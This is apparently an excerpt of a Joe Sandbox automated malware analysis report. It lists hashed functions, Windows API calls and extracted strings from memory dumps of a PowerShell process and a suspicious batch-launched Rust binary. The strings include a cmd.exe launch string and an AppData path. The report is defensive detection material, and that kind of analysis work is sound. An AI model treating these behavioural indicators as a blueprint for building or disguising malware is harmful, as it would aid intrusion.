Instruction ID: fffbb9a1526d5e4a69402a293f4d04ca24117417b57565432b4d8ac5f5dd4065
Opcode Fuzzy Hash: 145394a419f7041a41d094f4c6bff99434e2be109f831b863fe665520685aa35
Instruction Fuzzy Hash: 096226A2A0DBC90FE796AA7888552B47FE1EF56310B0C41FBD58DC71A3DD189C16C392

Function 00007FFB4B430061 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e4df205674e7859b00a5cd0ceeb29054c5d6289baf40635d6476f6c4af39a0
Instruction ID: 3ea10f8dfbc68a5ce29a7d8e73de35a7be1538984f719b2a2ce5c930488efb9a
Opcode Fuzzy Hash: 89e4df205674e7859b00a5cd0ceeb29054c5d6289baf40635d6476f6c4af39a0
Instruction Fuzzy Hash: 0DA13A62B0EBC54FE756EA7C88956607FE1EF56310B1C42FAC088CB2E3D9199C46C391

Function 00007FFB4B431B99 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8cb37b92de038c363eaec2167e3367717b0abff92581bfc6357699a2f3fb35b
Instruction ID: b30e46cf4ce1d856e5137a0b36805aeb193f337ff310a76929b464508d79a487
Opcode Fuzzy Hash: a8cb37b92de038c363eaec2167e3367717b0abff92581bfc6357699a2f3fb35b
Instruction Fuzzy Hash: A97159A3B1DE864FF7A9AE3C995227476C2EF41310F5C50BED64EC31E3DD18A8154282

Function 00007FFB4B4300DD Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c4eb7874e942ac35db0e2bbc306479ee520461276242a20800d819cf569c379
Instruction ID: 8f696f868be3e049ddca60992fc44f8ec388da8357735c1f87a7fb249a756eaf
Opcode Fuzzy Hash: 3c4eb7874e942ac35db0e2bbc306479ee520461276242a20800d819cf569c379
Instruction Fuzzy Hash: 4C51F772B0DA854FEB4AEE38C4506753BE1EF66310B1942AAC549CB2E3D916EC46C781

Function 00007FFB4B43156A Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b39c7afd14f7bd5356dcb44b85fd887df2618ec0484cdfbf2a5b404aacbde207
Instruction ID: b309f959f8dcadedefb14fc955502e5515ac1e59150a34a900aaa1d7bc2f9db5
Opcode Fuzzy Hash: b39c7afd14f7bd5356dcb44b85fd887df2618ec0484cdfbf2a5b404aacbde207
Instruction Fuzzy Hash: 894126D3F0EE8B0BF3A9AFBC89652B455C2EF94351B5C60BDD69EC31E2DC0898554241

Function 00007FFB4B431C94 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07fdd27bdacbc0604399ad9f3d12eab9340e1fb8aa0d9f42bc8cb7acb38efa4b
Instruction ID: 5e5f6ae4d352cbc78ca303809b709d29dbdbaf84e4a6a867d47dc8322b8f3885
Opcode Fuzzy Hash: 07fdd27bdacbc0604399ad9f3d12eab9340e1fb8aa0d9f42bc8cb7acb38efa4b
Instruction Fuzzy Hash: CC2155E3F0DA8A0BF3A9AA3C9951274A6C2EF81310B4C50FED64DC31A2DC19AC164245

Function 00007FFB4B432A49 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7863df2e1b96d07df46fca958ff3866c555c802c8f6b055c177e7763cd2624f
Instruction ID: 9c2972e15e8b5194f28a8170cc27303a8fe6d930053074f181149d2bca09052e
Opcode Fuzzy Hash: b7863df2e1b96d07df46fca958ff3866c555c802c8f6b055c177e7763cd2624f
Instruction Fuzzy Hash: 6011C1C3B0EA8A4FE665BA7CA8592B86AC1EB99790B1854FED09DC72D2DC0819054351

Function 00007FFB4B3637B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1680197845.00007FFB4B360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 0bcdb3c78bb6b7fe6d967a6f1acfca8e5751c9b582cef0d4074426a47c4685b6
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 7801677111CB0D8FD748EF0CE451AA6B7E0FB95364F10056DE58AC3661DA36E882CB45

Analysis Process: ajbs50ul.batPID: 5344, Parent PID: 5560COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41.8%
Total number of Nodes:	1018
Total number of Limit Nodes:	23

Executed Functions

Function 00007FF63D27B630 Relevance: 113.7, APIs: 51, Strings: 12, Instructions: 3418COMMON

Download Yara Rule

APIs

FreeEnvironmentStringsW.KERNEL32 ref: 00007FF63D27B7FB
memcpy.MSVCRT ref: 00007FF63D27C246
CloseHandle.KERNEL32 ref: 00007FF63D27C447
SetLastError.KERNEL32 ref: 00007FF63D27C74A
CloseHandle.KERNEL32 ref: 00007FF63D27F33F
CloseHandle.KERNEL32 ref: 00007FF63D27F381
CloseHandle.KERNEL32 ref: 00007FF63D27F3AF
CloseHandle.KERNEL32 ref: 00007FF63D27F3C4

Strings

PATHlibrary\std\src\sys_common\process.rs, xrefs: 00007FF63D27E1C0
assertion failed: self.height > 0, xrefs: 00007FF63D27F1C4
.exeprogram not found, xrefs: 00007FF63D27C25F
exe\\.\NULexit code: , xrefs: 00007FF63D27D341, 00007FF63D27DBBB, 00007FF63D27DD9F, 00007FF63D27E05C, 00007FF63D27E2B7
]?\\, xrefs: 00007FF63D27C0E0
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D27B635
assertion failed: is_code_point_boundary(self, new_len), xrefs: 00007FF63D27C577, 00007FF63D27D312
0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D27B631, 00007FF63D27F941
\cmd.exemaximum number of ProcThreadAttributes exceeded, xrefs: 00007FF63D27CCC1, 00007FF63D27CD0B
\?\\, xrefs: 00007FF63D27C0D8
#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c ", xrefs: 00007FF63D27D7F5
program path has no file name, xrefs: 00007FF63D27F990

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$EnvironmentErrorFreeLastStringsmemcpy
String ID: program path has no file name$#$*+-./:?@\_cmd.exe /e:ON /v:OFF /d /c "$.exeprogram not found$0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$PATHlibrary\std\src\sys_common\process.rs$\?\\$\cmd.exemaximum number of ProcThreadAttributes exceeded$]?\\$assertion failed: is_code_point_boundary(self, new_len)$assertion failed: self.height > 0$exe\\.\NULexit code:
API String ID: 3975177916-99999070
Opcode ID: d6ed25bce2ef54112ad26b6df2ea8f105e1cfb9e69587ec696d26041574ffdd1
Instruction ID: bcbfe84337e37f92f046b4cb2375c6d08c4132cecdf8c6c6cff4fc1474cbb430
Opcode Fuzzy Hash: d6ed25bce2ef54112ad26b6df2ea8f105e1cfb9e69587ec696d26041574ffdd1
Instruction Fuzzy Hash: 7F73C562A18ADA94EB708FA5D9403FD23A1FB44788F405135DF5D9BB9AFF38D641A300

Function 00007FF63D222FE9 Relevance: 13.0, APIs: 3, Strings: 4, Instructions: 741
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF63D2AAED0: memcpy.MSVCRT ref: 00007FF63D2AAF34

CreateMutexA.KERNEL32 ref: 00007FF63D2230C8
GetLastError.KERNEL32 ref: 00007FF63D2230CD

Strings

assertion failed: filled <= self.buf.init/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\core\src\io\borrowed_buf.rs, xrefs: 00007FF63D223D46
AppData/Roaming/.ini, xrefs: 00007FF63D2231FB
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D223174
0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D2237C6

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CreateErrorLastMutexmemcpy
String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$AppData/Roaming/.ini$assertion failed: filled <= self.buf.init/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\core\src\io\borrowed_buf.rs
API String ID: 2779520464-1460878906
Opcode ID: 2208cd9b1aedc1e5c4196ce2a1f96ceabf13c949d2de0a3d9b4a3fb4110523b7
Instruction ID: d98978ce8f6fae3fa1dc874b38062213ef9549753c13a4124155fdbe2b7a5e80
Opcode Fuzzy Hash: 2208cd9b1aedc1e5c4196ce2a1f96ceabf13c949d2de0a3d9b4a3fb4110523b7
Instruction Fuzzy Hash: 3772B332A18B8A81EA619F51E6507FE6360FF84784F804136EB8D97B99EF3DD145E700

Function 00007FF63D221180 Relevance: 10.6, APIs: 7, Instructions: 137
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF63D2213E6), ref: 00007FF63D2211BE
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF63D22122B
malloc.MSVCRT ref: 00007FF63D22125F
strlen.MSVCRT ref: 00007FF63D221284
malloc.MSVCRT ref: 00007FF63D221290
memcpy.MSVCRT ref: 00007FF63D2212A8

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
String ID:
API String ID: 3806033187-0
Opcode ID: 185179c1d74cf54bdcd9faed2df6e4b5ea4683eb18480226f85787322097f7df
Instruction ID: 932d56f1761de78443b3f7dcdb064ae9500b62f79c27eca7925472f54a066165
Opcode Fuzzy Hash: 185179c1d74cf54bdcd9faed2df6e4b5ea4683eb18480226f85787322097f7df
Instruction Fuzzy Hash: EB514936E1964E85F7519FA5EA40A79A3A5BF89B84F044031EA0CC7795EE3CFC45A300

Function 00007FF63D2794D0 Relevance: 8.0, APIs: 5, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF63D279520
ProcessPrng.BCRYPTPRIMITIVES ref: 00007FF63D27954C

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: Process$CurrentPrng
String ID:
API String ID: 716580790-0
Opcode ID: eaef61b7f3a25123cb60e49e0ffffa6c35956c0f61d86895f297292e8dad47ff
Instruction ID: 2c610a4f1e057cc0d0c38165a163d2c3c4da168ee0ec0541e1e60e243a86400e
Opcode Fuzzy Hash: eaef61b7f3a25123cb60e49e0ffffa6c35956c0f61d86895f297292e8dad47ff
Instruction Fuzzy Hash: 3102E1B2A0879A99EB648FA2D5403B927A0FB04798F004635EF6D877D6FE7CD544E300

Function 00007FF63D277000 Relevance: 3.1, APIs: 2, Instructions: 75
filenativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteFile.NTDLL ref: 00007FF63D277071
WaitForSingleObject.KERNEL32 ref: 00007FF63D277085

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: FileObjectSingleWaitWrite
String ID:
API String ID: 1507886151-0
Opcode ID: f90c94bbde2d15f5dd49e45bc93b021f94ca7a944ecab33971cf0177bd17e77b
Instruction ID: 92389c71ffba3d774cf3fcea697686971d9a5e9f28ee93d1ef05a5984aa2148c
Opcode Fuzzy Hash: f90c94bbde2d15f5dd49e45bc93b021f94ca7a944ecab33971cf0177bd17e77b
Instruction Fuzzy Hash: 5331AE22F04B9599FB20CBB4E8407E933A4AB94798F544130FA4D83B89EF38D5959340

Function 00007FF63D26C410 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 276
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF63D26C492
CloseHandle.KERNEL32 ref: 00007FF63D26C592
WaitForSingleObject.KERNEL32 ref: 00007FF63D26C59F
GetLastError.KERNEL32 ref: 00007FF63D26C5A8
CloseHandle.KERNEL32 ref: 00007FF63D26C633
CloseHandle.KERNEL32 ref: 00007FF63D26C63C
CloseHandle.KERNEL32 ref: 00007FF63D26C748
CloseHandle.KERNEL32 ref: 00007FF63D26C7A4
CloseHandle.KERNEL32 ref: 00007FF63D26C7AD

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D26C415, 00007FF63D26C7C5
0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character, xrefs: 00007FF63D26C411
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF63D26C521, 00007FF63D26C6AB, 00007FF63D26C6DF

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$ErrorLastObjectSingleWait
String ID: 0123456789ABCDEFxxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxxUnexpected format character$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards$called `Result::unwrap()` on an `Err` value
API String ID: 1454876536-677056220
Opcode ID: 70676137e3e6d45ccbc11c6f306daaa86eb11d731be05b264ede06c0d3c4266b
Instruction ID: b6b656e0234588c6b261e74d7e349d4e73b602a2dddbdfe18da4f691b006cbe2
Opcode Fuzzy Hash: 70676137e3e6d45ccbc11c6f306daaa86eb11d731be05b264ede06c0d3c4266b
Instruction Fuzzy Hash: D0C15E32A04B8689EB21EFA1D9403EC27A0FB44798F544131EF4C97B99EF78E585E340

Function 00007FF63D27A490 Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32 ref: 00007FF63D27A4CD
GetOverlappedResult.KERNEL32 ref: 00007FF63D27A5A1
GetLastError.KERNEL32 ref: 00007FF63D27A708

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseErrorHandleLastOverlappedResult
String ID:
API String ID: 3265865415-0
Opcode ID: 974bcaf89749150f73524150dc6f3ccb19d09a8b1d022fd24aea04af91ce6d5d
Instruction ID: 62df76da3bca00a006893f3c98478256693e2b0e7e4e7d42a26b9998b0da62cd
Opcode Fuzzy Hash: 974bcaf89749150f73524150dc6f3ccb19d09a8b1d022fd24aea04af91ce6d5d
Instruction Fuzzy Hash: E1712F22F08B9959FF208AB5CA413FD2660BB547A8F054531DF1C97B8AEF39E551A340

Function 00007FF63D273750 Relevance: 7.7, APIs: 5, Instructions: 184
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF63D2738CF
GetLastError.KERNEL32 ref: 00007FF63D2738E9
SetFileInformationByHandle.KERNEL32 ref: 00007FF63D27390F
GetLastError.KERNEL32 ref: 00007FF63D27394C
GetLastError.KERNEL32 ref: 00007FF63D273996

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: ErrorLast$File$CreateHandleInformation
String ID:
API String ID: 1834474996-0
Opcode ID: f273ef88e2bac6326e9b2940877e3eefe1307dc294658eb469f631bb574f4843
Instruction ID: 6e1d6802324bad36429ae165da2139d5c76bfa5173f7eca4990b2f0bd91ab53e
Opcode Fuzzy Hash: f273ef88e2bac6326e9b2940877e3eefe1307dc294658eb469f631bb574f4843
Instruction Fuzzy Hash: 7661F6B1F0C15AA5FB318AA1C605BBD2690AF04B94F144131DFAD97BCBEE3DD846A301

Function 00007FF63D25BBF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards, xrefs: 00007FF63D25BBF5

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID:
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789Time went backwards
API String ID: 0-3387848338
Opcode ID: 015c47d9861bb723f8c421909504bd1f1d81b3f3632bc4d622d94ac18b0f38f6
Instruction ID: 361c8facc3bf7dfed9206de60b0c51e44320e07974128a54fade64b2e5cbddda
Opcode Fuzzy Hash: 015c47d9861bb723f8c421909504bd1f1d81b3f3632bc4d622d94ac18b0f38f6
Instruction Fuzzy Hash: 97312752F0868E98FB16DBA15B057B89662AF44BD8F584030EF1C87B89FE7CE551E340

Function 00007FF63D27A7A0 Relevance: 3.8, APIs: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF63D27A827
CloseHandle.KERNEL32 ref: 00007FF63D27A868
CloseHandle.KERNEL32 ref: 00007FF63D27A870

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: CloseHandle$ErrorLast
String ID:
API String ID: 1798101686-0
Opcode ID: a3ddd86106da4bf881b97e782787d81133a10f990cbf08c49f9bebbb8d9dd90e
Instruction ID: 8604b392b6f3c229a2058d649afb0645a9b431eecb9d33a25774f29ee8b56d9e
Opcode Fuzzy Hash: a3ddd86106da4bf881b97e782787d81133a10f990cbf08c49f9bebbb8d9dd90e
Instruction Fuzzy Hash: 1311B422F0474546F755AB52A6403796690FB88BA0F184134EF8C47BC2FF3CE9A2A350

Function 00007FF63D2572A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadDescription.KERNELBASE ref: 00007FF63D2572E7

Strings

main, xrefs: 00007FF63D2572DD

Memory Dump Source

Source File: 00000004.00000002.1638224278.00007FF63D221000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF63D220000, based on PE: true

Associated: 00000004.00000002.1638006094.00007FF63D220000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1640044585.00007FF63D2DB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1641175246.00007FF63D2DC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1643969128.00007FF63D3FB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644138380.00007FF63D3FC000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1644183064.00007FF63D3FF000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff63d220000_ajbs50ul.jbxd

Similarity

API ID: DescriptionThread
String ID: main
API String ID: 2285587249-3207122276
Opcode ID: ab7703ec82c3bf8afcebab53cce1798250a40d462dbe90b47f8c00be0dd91670
Instruction ID: d1c8ae4a3548e7624f89d1618130546881123076abe5362839bba7cc4470c7fb
Opcode Fuzzy Hash: ab7703ec82c3bf8afcebab53cce1798250a40d462dbe90b47f8c00be0dd91670
